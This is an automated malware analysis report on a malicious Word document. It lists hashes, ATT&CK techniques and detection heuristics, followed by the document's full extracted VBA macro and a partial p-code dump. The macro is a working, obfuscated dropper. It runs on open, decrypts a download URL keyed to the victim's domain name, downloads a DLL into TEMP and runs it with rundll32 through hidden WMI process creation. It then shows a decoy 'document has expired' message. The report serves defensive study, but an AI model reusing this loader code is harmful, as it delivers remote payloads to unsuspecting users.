Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 250a95582766870b…

MALICIOUS

Office (OLE)

109.5 KB Created: 2018-05-16 17:24:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: a9bec46e46d192f2f90bf0f35b68d772 SHA-1: 412a1b0ad9fa0dd84c8efda9ebccdfd71ef80420 SHA-256: 250a95582766870b2356ae2d22a93270e9f09a878571db193e5a5f04b4fb3480
538 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer T1055.012 Process Hollowing

The sample is a malicious Office document containing obfuscated VBA macros. Critical heuristics indicate the VBA code attempts to download and write a file to disk, likely a second-stage payload, using HTTP and then execute it via CreateRemoteThread and WriteProcessMemory. The presence of an Auto_Open macro and the use of CreateObject and Shell functions further support this malicious intent. The specific malware family could not be confidently identified.

Heuristics 15

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORY
    Reference to WriteProcessMemory API
  • Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREAD
    Reference to CreateRemoteThread API
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        dollop.Write ampleMacarons.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set ampleMacarons = CreateObject(StrReverse("PTTHLMX.tfosorciM"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set ampleMacarons = CreateObject(StrReverse("PTTHLMX.tfosorciM"))
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
            Set objWMIService = GetObject(strGetObject)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        keyVar = UCase(Environ("USERDNSDOMAIN"))
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 34349 bytes
SHA-256: a079740a3470f0b2d1e63108d66e0cf9afcfbc39714e08dd5839c6fe56ca8144
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const namePrefix = "oegaid"
Private Const nameSuffix = ".dll"

Private Const clOneMask = 16515072
Private Const clTwoMask = 258048
Private Const clThreeMask = 4032
Private Const clFourMask = 63

Private Const clHighMask = 16711680
Private Const clMidMask = 65280
Private Const clLowMask = 255

Private Const cl2Exp18 = 262144
Private Const cl2Exp12 = 4096
Private Const cl2Exp6 = 64
Private Const cl2Exp8 = 256
Private Const cl2Exp16 = 65536

Private crc32Table() As Long


Public Function Decode64(ByVal sString As String) As Byte()

    Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
    Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
    Dim lTemp As Long

    sString = Replace(sString, vbCr, vbNullString)
    sString = Replace(sString, vbLf, vbNullString)

    lTemp = Len(sString) Mod 4
    If lTemp Then
        Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.")
    End If

    If InStrRev(sString, "==") Then
        iPad = 2
    ElseIf InStrRev(sString, "=") Then
        iPad = 1
    End If

    For lTemp = 0 To 255
        Select Case lTemp
            Case 65 To 90
                bTrans(lTemp) = lTemp - 65
            Case 97 To 122
                bTrans(lTemp) = lTemp - 71
            Case 48 To 57
                bTrans(lTemp) = lTemp + 4
            Case 43
                bTrans(lTemp) = 62
            Case 47
                bTrans(lTemp) = 63
        End Select
    Next lTemp

    For lTemp = 0 To 63
        lPowers6(lTemp) = lTemp * cl2Exp6
        lPowers12(lTemp) = lTemp * cl2Exp12
        lPowers18(lTemp) = lTemp * cl2Exp18
    Next lTemp

    bIn = StrConv(sString, vbFromUnicode)
    ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)

    For lChar = 0 To UBound(bIn) Step 4
        lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
                lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))
        lTemp = lQuad And clHighMask
        bOut(lPos) = lTemp \ cl2Exp16
        lTemp = lQuad And clMidMask
        bOut(lPos + 1) = lTemp \ cl2Exp8
        bOut(lPos + 2) = lQuad And clLowMask
        lPos = lPos + 3
    Next lChar
    If iPad Then
        ReDim Preserve bOut(UBound(bOut) - iPad)
    End If
    Decode64 = bOut
   
End Function


Function StringToBytes(ByVal str As Variant) As Byte()
    Dim retVal() As Byte
    Dim tmp() As String
    Dim k As Integer
    tmp = Split(StrConv(str, vbUnicode), vbNullChar)
    k = UBound(tmp) - 1
    ReDim Preserve retVal(k)
    For i = 0 To (UBound(tmp) - 1)
        retVal(i) = Asc(tmp(i))
    Next
    StringToBytes = retVal
End Function


Function BytesToString(bArray As Variant) As String
    Dim i As Integer
    For i = 0 To UBound(bArray)
        BytesToString = BytesToString & Chr(bArray(i))
    Next
End Function



Private Sub Class_initialize()


    Dim dwPolynomial As Long
    dwPolynomial = &HEDB88320
    Dim i As Integer, j As Integer

    ReDim crc32Table(256)
    Dim dwCrc As Long

    For i = 0 To 255
        dwCrc = i
        For j = 8 To 1 Step -1
            If (dwCrc And 1) Then
                dwCrc = ((dwCrc And &HFFFFFFFE) \ 2&) And &H7FFFFFFF
                dwCrc = dwCrc Xor dwPolynomial
            Else
                dwCrc = ((dwCrc And &HFFFFFFFE) \ 2&) And &H7FFFFFFF
            End If
        Next j
        crc32Table(i) = dwCrc
    Next i

End Sub

Function CRC32(ByRef Buffer() As Byte) As Long
Class_initialize

Dim crc32Result As Long
crc32Result = &HFFFFFFFF
      
Dim i As Integer
Dim iLookup As Integer

For Each x In Buffer

      iLookup = (crc32Result And &HFF) Xor x
      crc32Result = ((crc32Result And &HFFFFFF00) \ &H100) _
          And 16777215
      crc32Result = crc32Result Xor crc32Table(iLookup)

Next

CRC32 = Not (crc32Result)

End Function


Function XorDecodeBytes(iKey As Variant, iMessage As Variant) As Byte()

    Dim i, j, k, iKeyIndex As Integer
    Dim iTmpKey() As Variant
    Dim cfc As Integer
        
    
    cfc = &HEE
    Dim retVal() As Byte
    
    
    k = UBound(iMessage)
    ReDim retVal(k)
    
    
    For i = 0 To UBound(iMessage)
         retVal(i) = iMessage(i)
    Next
    

    
    For i = 0 To UBound(iMessage)
        iKeyIndex = i Mod (UBound(iKey) + 1)
        j = (iKey(iKeyIndex) Xor iMessage(i)) Xor cfc
        cfc = iMessage(i)
        retVal(i) = j
    Next
    XorDecodeBytes = retVal
End Function
Function Slice1DArray(ByRef source() As Byte, ByVal start As Integer, Optional ByVal toend As Integer = -1) As Byte()
    Dim retVal() As Byte
    Dim length As Integer
    Dim i As Integer
    If toend = -1 Then
        length = UBound(source) - start
        toend = UBound(source)
    Else
        length = toend - start
    End If
    ReDim retVal(length)
    For i = start To toend
        retVal(i - start) = source(i)
    Next
    Slice1DArray = retVal

End Function



Function XorDecryptAndVerifyCRC(ByRef iKey As Variant, iMessage As Variant) As Byte()
    Dim candidate_bytes() As Byte
    Dim sPlaintext As String
    Dim bPlaintext() As Byte
    Dim crcRecoveredValue As Long
    Dim s As String
    candidate_bytes = XorDecodeBytes(iKey, iMessage)
        

    sPlaintext = BytesToString(candidate_bytes)
    On Error GoTo Error
    s = BytesToString(iKey)
    i = InStr(sPlaintext, " ")
    If i = 0 Then
        GoTo Error
    End If
    s = Left(sPlaintext, i)
    
    For j = 1 To Len(s) - 1
        c = Mid(s, j, 1)
        If InStr("-0123456789", c) = 0 Then
            GoTo Error
        End If
    Next
        
    crcRecoveredValue = CLng((Left(sPlaintext, i)))
    bPlaintext = Slice1DArray(candidate_bytes, i)
    x = CRC32(bPlaintext)
    If crcRecoveredValue = CRC32(bPlaintext) Then
        XorDecryptAndVerifyCRC = bPlaintext
        Return
    End If
Error:

End Function


Function ExpandDotString(ByVal sInput As String) As String()
    Dim retVal() As String
    Dim chunks() As String
    Dim k, i As Integer
    
    ReDim retVal(0)
    retVal(0) = sInput
    Dim current_chunk As String
    Dim last_concat As String
    k = 0
    
    
    chunks = Split(sInput, ".")
    last_concat = ""
    For i = UBound(chunks) To LBound(chunks) Step -1
        current_chunk = chunks(i)
        If last_concat = "" Then
            last_concat = current_chunk
            k = k + 1
            ReDim Preserve retVal(k)
            retVal(k) = current_chunk
            GoTo Loop1
            
        Else
            ReDim Preserve retVal(k + 2)
            retVal(k + 1) = current_chunk
            last_concat = current_chunk & "." & last_concat
            retVal(k + 2) = last_concat
            k = k + 2
        End If
Loop1:
    Next
    ExpandDotString = retVal
End Function

Function TryAllKeys(ByVal sInput As String, ByRef sKeys As Variant) As Byte()
    Dim candidates() As String
    Dim c As Variant
    candidates = ExpandDotString(sInput)
    
    For Each k In sKeys
        For Each c In candidates
'
            TryAllKeys = XorDecryptAndVerifyCRC(StringToBytes(c), k)
            If (Not Not TryAllKeys) <> 0 Then
                
            
                Exit Function
            End If

        Next c
    Next k
    
    Err.Raise vbObjectError + 555, "TryAllkeys", "Master key not found :/"
End Function


Public Sub ReThrowError(ByRef objError As ErrObject)
    ' Raise
    Err.Raise objError.Number, objError.source, objError.Description, objError.HelpFile, objError.HelpContext
End Sub


Sub RunMe()
    Dim s, keyVar, sPlaintext As String
    Dim masterKey As Variant
    keyVar = UCase(Environ("USERDNSDOMAIN"))
    Dim payload As String
    payload = ""
    Dim i As Integer
   
    Dim keyScheduleBytes() As Variant
    Dim myURL As String
    Dim keySchedule(4) As String
    keySchedule(0) = "kO2U8of+kuaH8Y3px7Hb6se30qbYuZn52vCC/Q=="
    keySchedule(1) = "kOCW4Z78hfqN95b32qnX5sa5zbPWoon/0OeQ7A=="
    keySchedule(2) = "kOyH+Zjkj/OT6Yjl1a/P4NKuzbPWrpjn1v+a5Q=="
    keySchedule(3) = "kO2U8of+kuaH4538yrrB99Ow06zbu5nj1fSQ8Q=="
    keySchedule(4) = "jv6f4ZL6j/+V75zly73X+Niwzb/QqIznyO2C/Q=="
    payload = payload & "tbC04rWwsri8qaTi9OClreH5vai+ofm4/a2p6ejkv///5ra7t6mpqK6o4Oew"
    payload = payload & "5+n2pqKi8Ly4vb+wqPz3ovPqraD2sKavseW57Kyk8//vqrW16769r7HAt8W5"
    payload = payload & "iPPe9IP9s8C8nanVoN2/2ZHgy+me/7Lhvbyl"


    ReDim keyScheduleBytes(UBound(keySchedule))
    For i = 0 To UBound(keySchedule)
        keyScheduleBytes(i) = Decode64(keySchedule(i))
    Next
    
    masterKey = TryAllKeys(keyVar, keyScheduleBytes)
    ciphertext = Decode64(payload)
    bPlaintext = XorDecryptAndVerifyCRC(masterKey, ciphertext)
    sPlaintext = BytesToString(bPlaintext)
    
    zzz = sPlaintext
    Dim ampleMacarons
    Dim bStrm
    Dim filename
    Set ampleMacarons = CreateObject(StrReverse("PTTHLMX.tfosorciM"))
    ampleMacarons.Open "GET", zzz, False
    ampleMacarons.Send
    Set dollop = CreateObject(StrReverse("maertS.bdodA"))
    dollop.Type = 1
    dollop.Open
    dollop.Write ampleMacarons.responseBody
    dstPath = Environ$("TEMP") & "\" & namePrefix & "_" & DateDiff("s", #1/1/1970#, Now()) & nameSuffix
    savePath = dstPath
    dollop.savetofile savePath, 2
   
    
    Const HIDDEN_WINDOW = 0
        strComputer = "."
        abc = StrReverse("23lldnur") & " " & dstPath & ",Start"
        strGetObject = StrReverse("2vmic\toor\.\\:stmgmniw")
        Set objWMIService = GetObject(strGetObject)
        Set objStartup = objWMIService.Get(StrReverse("putratSssecorP_23niW"))
        Set objConfig = objStartup.SpawnInstance_
        objConfig.ShowWindow = HIDDEN_WINDOW
        Set objProcess = GetObject(strGetObject & StrReverse("ssecorP_23niW:"))
        objProcess.Create abc, Null, objConfig, intProcessID
   MsgBox ("This document has expired. Please contact the sender.")
    

End Sub

Sub AutoOpen()
RunMe
End Sub













Attribute VB_Name = "NewMacros"

' Processing file: /tmp/qstore_kvv_xoyp
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 31481 bytes
' Line #0:
' 	Dim (Private Const) 
' 	LitStr 0x0006 "oegaid"
' 	VarDefn _B_var_Print
' Line #1:
' 	Dim (Private Const) 
' 	LitStr 0x0004 ".dll"
' 	VarDefn namePrefix
' Line #2:
' Line #3:
' 	Dim (Private Const) 
' 	LitDI4 0x0000 0x00FC 
' 	VarDefn nameSuffix
' Line #4:
' 	Dim (Private Const) 
' 	LitDI4 0xF000 0x0003 
' 	VarDefn clOneMask
' Line #5:
' 	Dim (Private Const) 
' 	LitDI2 0x0FC0 
' 	VarDefn clTwoMask
' Line #6:
' 	Dim (Private Const) 
' 	LitDI2 0x003F 
' 	VarDefn clThreeMask
' Line #7:
' Line #8:
' 	Dim (Private Const) 
' 	LitDI4 0x0000 0x00FF 
' 	VarDefn clFourMask
' Line #9:
' 	Dim (Private Const) 
' 	LitDI4 0xFF00 0x0000 
' 	VarDefn clHighMask
' Line #10:
' 	Dim (Private Const) 
' 	LitDI2 0x00FF 
' 	VarDefn clMidMask
' Line #11:
' Line #12:
' 	Dim (Private Const) 
' 	LitDI4 0x0000 0x0004 
' 	VarDefn clLowMask
' Line #13:
' 	Dim (Private Const) 
' 	LitDI2 0x1000 
' 	VarDefn cl2Exp18
' Line #14:
' 	Dim (Private Const) 
' 	LitDI2 0x0040 
' 	VarDefn cl2Exp12
' Line #15:
' 	Dim (Private Const) 
' 	LitDI2 0x0100 
' 	VarDefn cl2Exp6
' Line #16:
' 	Dim (Private Const) 
' 	LitDI4 0x0000 0x0001 
' 	VarDefn cl2Exp8
' Line #17:
' Line #18:
' 	Dim (Private) 
' 	VarDefn cl2Exp16
' Line #19:
' Line #20:
' Line #21:
' 	FuncDefn (Public Function crc32Table(ByVal Decode64 As String) As Append)
' Line #22:
' Line #23:
' 	Dim 
' 	VarDefn sString
' 	VarDefn bOut
' 	OptionBase 
' 	LitDI2 0x00FF 
' 	VarDefn bIn
' 	OptionBase 
' 	LitDI2 0x003F 
' 	VarDefn bTrans
' 	OptionBase 
' 	LitDI2 0x003F 
' 	VarDefn lPowers6
' Line #24:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x003F 
' 	VarDefn lPowers12
' 	VarDefn lPowers18 (As Long)
' 	VarDefn lQuad (As Integer)
' 	VarDefn iPad (As Long)
' 	VarDefn lChar (As Long)
' 	VarDefn lPos (As String)
' Line #25:
' 	Dim 
' 	VarDefn sOut (As Long)
' Line #26:
' Line #27:
' 	Ld Decode64 
' 	Ld lTemp 
' 	Ld vbNullString 
' 	ArgsLd Replace 0x0003 
' 	St Decode64 
' Line #28:
' 	Ld Decode64 
' 	Ld nodeTypedValue 
' 	Ld vbNullString 
' 	ArgsLd Replace 0x0003 
' 	St Decode64 
' Line #29:
' Line #30:
' 	Ld Decode64 
' 	FnLen 
' 	LitDI2 0x0004 
' 	Mod 
' 	St sOut 
' Line #31:
' 	Ld sOut 
' 	IfBlock 
' Line #32:
' 	Ld Raise 
' 	LitStr 0x0008 "MyDecode"
' 	LitStr 0x0021 "Input string is not valid Base64."
' 	Ld vbCr 
' 	ArgsMemCall (Call) Err 0x0003 
' Line #33:
' 	EndIfBlock 
' Line #34:
' Line #35:
' 	Ld Decode64 
' 	LitStr 0x0002 "=="
' 	ArgsLd vbObjectError 0x0002 
' 	IfBlock 
' Line #36:
' 	LitDI2 0x0002 
' 	St lQuad 
' Line #37:
' 	Ld Decode64 
' 	LitStr 0x0001 "="
' 	ArgsLd vbObjectError 0x0002 
' 	ElseIfBlock 
' Line #38:
' 	LitDI2 0x0001 
' 	St lQuad 
' Line #39:
' 	EndIfBlock 
' Line #40:
' Line #41:
' 	StartForVariable 
' 	Ld sOut 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	LitDI2 0x00FF 
' 	For 
' Line #42:
' 	Ld sOut 
' 	SelectCase 
' Line #43:
' 	LitDI2 0x0041 
' 	LitDI2 0x005A 
' 	CaseTo 
' 	CaseDone 
' Line #44:
' 	Ld sOut 
' 	LitDI2 0x0041 
' 	Sub 
' 	Ld sOut 
' 	ArgsSt bIn 0x0001 
' Line #45:
' 	LitDI2 0x0061 
' 	LitDI2 0x007A 
' 	CaseTo 
' 	CaseDone 
' Line #46:
' 	Ld sOut 
' 	LitDI2 0x0047 
' 	Sub 
' 	Ld sOut 
' 	ArgsSt bIn 0x0001 
' Line #47:
' 	LitDI2 0x0030 
' 	LitDI2 0x0039 
' 	CaseTo 
' 	CaseDone 
' Line #48:
' 	Ld sOut 
' 	LitDI2 0x0004 
' 	Add 
' 	Ld sOut 
' 	ArgsSt bIn 0x0001 
' Line #49:
' 	LitDI2 0x002B 
' 	Case 
' 	CaseDone 
' Line #50:
' 	LitDI2 0x003E 
' 	Ld sOut 
' 	ArgsSt bIn 0x0001 
' Line #51:
' 	LitDI2 0x002F 
' 	Case 
' 	CaseDone 
' Line #52:
' 	LitDI2 0x003F 
' 	Ld sOut 
' 	ArgsSt bIn 0x0001 
' Line #53:
' 	EndSelect 
' Line #54:
' 	StartForVariable 
' 	Ld sOut 
' 	EndForVariable 
' 	NextVar 
' Line #55:
' Line #56:
' 	StartForVariable 
' 	Ld sOut 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	LitDI2 0x003F 
' 	For 
' Line #57:
' 	Ld sOut 
' 	Ld cl2Exp12 
' 	Mul 
' 	Ld sOut 
' 	ArgsSt bTrans 0x0001 
' Line #58:
' 	Ld sOut 
' 	Ld cl2Exp18 
' 	Mul 
' 	Ld sOut 
' 	ArgsSt lPowers6 0x0001 
' Line #59:
' 	Ld sOut 
' 	Ld clLowMask 
' 	Mul 
' 	Ld sOut 
' 	ArgsSt lPowers12 0x0001 
' Line #60:
' 	StartForVariable 
' 	Ld sOut 
' 	EndForVariable 
' 	NextVar 
' Line #61:
' Line #62:
' 	Ld Decode64 
' 	Ld InStrRev 
' 	ArgsLd TransformFinalBlock 0x0002 
' 	St bOut 
' Line #63:
' 	OptionBase 
' 	Ld bOut 
' 	FnUBound 0x0000 
' 	LitDI2 0x0001 
' 	Add 
' 	Paren 
' 	LitDI2 0x0004 
' 	IDiv 
' 	Paren 
' 	LitDI2 0x0003 
' 	Mul 
' 	Paren 
' 	LitDI2 0x0001 
' 	Sub 
' 	Redim sString 0x0001 (As Variant)
' Line #64:
' Line #65:
' 	StartForVariable 
' 	Ld iPad 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	Ld bOut 
' 	FnUBound 0x0000 
' 	LitDI2 0x0004 
' 	ForStep 
' Line #66:
' 	LineCont 0x0004 1A 00 10 00
' 	Ld iPad 
' 	ArgsLd bOut 0x0001 
' 	ArgsLd bIn 0x0001 
' 	ArgsLd lPowers12 0x0001 
' 	Ld iPad 
' 	LitDI2 0x0001 
' 	Add 
' 	ArgsLd bOut 0x0001 
' 	ArgsLd bIn 0x0001 
' 	ArgsLd lPowers6 0x0001 
' 	Add 
' 	Ld iPad 
' 	LitDI2 0x0002 
' 	Add 
' 	ArgsLd bOut 0x0001 
' 	ArgsLd bIn 0x0001 
' 	ArgsLd bTrans 0x0001 
' 	Add 
' 	Ld iPad 
' 	LitDI2 0x0003 
' 	Add 
' 	ArgsLd bOut 0x0001 
' 	ArgsLd bIn 0x0001 
' 	Add 
' 	St lPowers18 
' Line #67:
' 	Ld lPowers18 
' 	Ld clFourMask 
' 	And 
' 	St sOut 
' Line #68:
' 	Ld sOut 
' 	Ld cl2Exp8 
' 	IDiv 
' 	Ld lChar 
' 	ArgsSt sString 0x0001 
' Line #69:
' 	Ld lPowers18 
' 	Ld clHighMask 
' 	And 
' 	St sOut 
' Line #70:
' 	Ld sOut 
' 	Ld cl2Exp6 
' 	IDiv 
' 	Ld lChar 
' 	LitDI2 0x0001 
' 	Add 
' 	ArgsSt sString 0x0001 
' Line #71:
' 	Ld lPowers18 
' 	Ld clMidMask 
' 	And 
' 	Ld lChar 
' 	LitDI2 0x0002 
' 	Add 
' 	ArgsSt sString 0x0001 
' Line #72:
' 	Ld lChar 
' 	LitDI2 0x0003 
' 	Add 
' 	St lChar 
' Line #73:
' 	StartForVariable 
' 	Ld iPad 
' 	EndForVariable 
' 	NextVar 
' Line #74:
' 	Ld lQuad 
' 	IfBlock 
' Line #75:
' 	OptionBase 
' 	Ld sString 
' 	FnUBound 0x0000 
' 	Ld lQuad 
' 	Sub 
' 	Redim (Preserve) sString 0x0001 (As Variant)
' Line #76:
' 	EndIfBlock 
' Line #77:
' 	Ld sString 
' 	St crc32Table 
' Line #78:
' Line #79:
' 	EndFunc 
' Line #80:
' Line #81:
' Line #82:
' 	FuncDefn (Function vbFromUnicode(ByVal StringToBytes As Variant) As Append)
' Line #83:
' 	Dim 
' 	VarDefn str
' Line #84:
' 	Dim 
' 	VarDefn retVal
' Line #85:
' 	Dim 
' 	VarDefn tmp (As Integer)
' Line #86:
' 	Ld StringToBytes 
' 	Ld StrConv 
' 	ArgsLd TransformFinalBlock 0x0002 
' 	Ld k 
' 	ArgsLd Split 0x0002 
' 	St retVal 
' Line #87:
' 	Ld retVal 
' 	FnUBound 0x0000 
' 	LitDI2 0x0001 
' 	Sub 
' 	St tmp 
' Line #88:
' 	OptionBase 
' 	Ld tmp 
' 	Redim (Preserve) str 0x0001 (As Variant)
' Line #89:
' 	StartForVariable 
' 	Ld CreateDecryptor 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	Ld retVal 
' 	FnUBound 0x0000 
' 	LitDI2 0x0001 
' 	Sub 
' 	Paren 
' 	For 
' Line #90:
' 	Ld CreateDecryptor 
' 	ArgsLd retVal 0x0001 
' 	ArgsLd vbNullChar 0x0001 
' 	Ld CreateDecryptor 
' 	ArgsSt str 0x0001 
' Line #91:
' 	StartForVariable 
' 	Next 
' Line #92:
' 	Ld str 
' 	St vbFromUnicode 
' Line #93:
' 	EndFunc 
' Line #94:
' Line #95:
' Line #96:
' 	FuncDefn (Function Asc(BytesToString As Variant) As String)
' Line #97:
' 	Dim 
' 	VarDefn CreateDecryptor (As Integer)
' Line #98:
' 	StartForVariable 
' 	Ld CreateDecryptor 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	Ld BytesToString 
' 	FnUBound 0x0000 
' 	For 
' Line #99:
' 	Ld Asc 
' 	Ld CreateDecryptor 
' 	ArgsLd BytesToString 0x0001 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	St Asc 
' Line #100:
' 	StartForVariable 
' 	Next 
' Line #101:
' 	EndFunc 
' Line #102:
' Line #103:
' Line #104:
' Line #105:
' 	FuncDefn (Sub bArray())
' Line #106:
' Line #107:
' Line #108:
' 	Dim 
' 	VarDefn Class_initialize (As Long)
' Line #109:
' 	LitHI4 0x8320 0xEDB8 
' 	St Class_initialize 
' Line #110:
' 	Dim 
' 	VarDefn CreateDecryptor (As Integer)
' 	VarDefn dwPolynomial (As Integer)
' Line #111:
' Line #112:
' 	OptionBase 
' 	LitDI2 0x0100 
' 	Redim cl2Exp16 0x0001 (As Variant)
' Line #113:
' 	Dim 
' 	VarDefn j (As Long)
' Line #114:
' Line #115:
' 	StartForVariable 
' 	Ld CreateDecryptor 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	LitDI2 0x00FF 
' 	For 
' Line #116:
' 	Ld CreateDecryptor 
' 	St j 
' Line #117:
' 	StartForVariable 
' 	Ld dwPolynomial 
' 	EndForVariable 
' 	LitDI2 0x0008 
' 	LitDI2 0x0001 
' 	LitDI2 0x0001 
' 	UMi 
' 	ForStep 
' Line #118:
' 	Ld j 
' 	LitDI2 0x0001 
' 	And 
' 	Paren 
' 	IfBlock 
' Line #119:
' 	Ld j 
' 	LitHI4 0xFFFE 0xFFFF 
' 	And 
' 	Paren 
' 	LitDI4 0x0002 0x0000 
' 	IDiv 
' 	Paren 
' 	LitHI4 0xFFFF 0x7FFF 
' 	And 
' 	St j 
' Line #120:
' 	Ld j 
' 	Ld Class_initialize 
' 	Xor 
' 	St j 
' Line #121:
' 	ElseBlock 
' Line #122:
' 	Ld j 
' 	LitHI4 0xFFFE 0xFFFF 
' 	And 
' 	Paren 
' 	LitDI4 0x0002 0x0000 
' 	IDiv 
' 	Paren 
' 	LitHI4 0xFFFF 0x7FFF 
' 	And 
' 	St j 
' Line #123:
' 	EndIfBlock 
' Line #124:
' 	StartForVariable 
' 	Ld dwPolynomial 
' 	EndForVariable 
' 	NextVar 
' Line #125:
' 	Ld j 
' 	Ld CreateDecryptor 
' 	ArgsSt cl2Exp16 0x0001 
' Line #126:
' 	StartForVariable 
' 	Ld CreateDecryptor 
' 	EndForVariable 
' 	NextVar 
' Line #127:
' Line #128:
' 	EndSub 
' Line #129:
' Line #130:
' 	FuncDefn (Function dwCrc(ByRef CRC32 As ) As Long)
' Line #131:
' 	ArgsCall bArray 0x0000 
' Line #132:
' Line #133:
' 	Dim 
' 	VarDefn Buffer (As Long)
' Line #134:
' 	LitHI4 0xFFFF 0xFFFF 
' 	St Buffer 
' Line #135:
' Line #136:
' 	Dim 
' 	VarDefn CreateDecryptor (As Integer)
' Line #137:
' 	Dim 
' 	VarDefn crc32Result (As Integer)
' Line #138:
' Line #139:
' 	StartForVariable 
' 	Ld iLookup 
' 	EndForVariable 
' 	Ld CRC32 
' 	ForEach 
' Line #140:
' Line #141:
' 	Ld Buffer 
' 	LitHI2 0x00FF 
' 	And 
' 	Paren 
' 	Ld iLookup 
' 	Xor 
' 	St crc32Result 
' Line #142:
' 	LineCont 0x0004 0B 00 0A 00
' 	Ld Buffer 
' 	LitHI4 0xFF00 0xFFFF 
' 	And 
' 	Paren 
' 	LitHI2 0x0100 
' 	IDiv 
' 	Paren 
' 	LitDI4 0xFFFF 0x00FF 
' 	And 
' 	St Buffer 
' Line #143:
' 	Ld Buffer 
' 	Ld crc32Result 
' 	ArgsLd cl2Exp16 0x0001 
' 	Xor 
' 	St Buffer 
' Line #144:
' Line #145:
' 	StartForVariable 
' 	Next 
' Line #146:
' Line #147:
' 	Ld Buffer 
' 	Paren 
' 	Not 
' 	St dwCrc 
…